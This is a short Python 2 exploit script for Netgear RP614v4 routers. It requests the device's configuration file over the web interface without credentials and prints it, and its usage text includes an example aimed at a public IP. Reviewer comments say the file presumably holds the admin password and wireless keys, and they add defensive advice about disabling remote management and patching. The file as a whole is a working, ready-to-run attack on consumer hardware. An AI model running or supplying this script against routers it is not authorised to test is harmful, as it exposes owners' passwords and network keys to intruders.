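#!/usr/bin/env python
# RP614v4 Exploit
# Tested on Firmware version: v1.1.2_09.01 (Newest as of Wed Mar 24, 2010)
# Author: Kyle Young
#
# Python 2 script (it uses urllib2).
#
# What it does: after a quick TCP reachability probe, it requests
# /vgn/jsp/netgear.cfg from the router's web interface without sending any
# credentials and prints the response body. A successful download means the
# device hands its configuration file to an unauthenticated client.
#
# NOTE(review): the configuration file presumably contains the admin password
# and wireless keys -- confirm against a real dump, and handle the printed
# output as secret material (no shared terminals, logs or tickets).
#
# Defensive reading: a device that answers this request should have its web
# management interface kept off untrusted networks (remote management
# disabled) and be updated if the vendor ships a fix; the failure message
# below already anticipates patched units.
import urllib2
import sys
import socket

# Timeout for the TCP reachability probe, in seconds (value kept from the
# original script; it is short, so slow links may be reported as closed).
PROBE_TIMEOUT = 0.25
# Timeout for the HTTP request, in seconds. The original passed none, so an
# unresponsive web server could hang the script indefinitely.
FETCH_TIMEOUT = 10


def listhelp():
    """Print the usage text and exit with status 1."""
    print("Please invoke this program with an IP and port")
    print("Example: python rp614v4exploit.py 192.168.1.1 80")
    print("Example: python rp614v4exploit.py [public ip] 8080")
    sys.exit(1)


if len(sys.argv) < 3:
    listhelp()

host = sys.argv[1]
try:
    port = int(sys.argv[2])
except ValueError:
    # A non-numeric port used to end in a traceback; show the usage instead.
    listhelp()
if not 0 < port < 65536:
    listhelp()

# Reachability probe: fail fast with a readable message when nothing listens.
con = None
try:
    con = socket.socket()
    con.settimeout(PROBE_TIMEOUT)
    con.connect((host, port))
except socket.error:
    # socket.timeout and socket.gaierror are subclasses of socket.error.
    print("Port appears to be closed on this host..")
    sys.exit(1)
finally:
    # The original called con.close() inside the except branch, which raised
    # NameError if socket.socket() itself had failed.
    if con is not None:
        con.close()

exploit = "http://%s:%d/vgn/jsp/netgear.cfg" % (host, port)  #Yes.. I know I see it..#
try:
    request = urllib2.urlopen(exploit, timeout=FETCH_TIMEOUT)
    try:
        config = request.read()
    finally:
        request.close()
except (urllib2.URLError, socket.error):
    # urllib2.HTTPError is a subclass of URLError. Catching the base class and
    # socket.error also covers refused connections and read timeouts, which
    # previously escaped as tracebacks.
    print("I could not download the netgear.cfg file, make sure you have the right address or the router may have had a fix/patch applied to it")
    sys.exit(1)

print(config)
sys.exit(0)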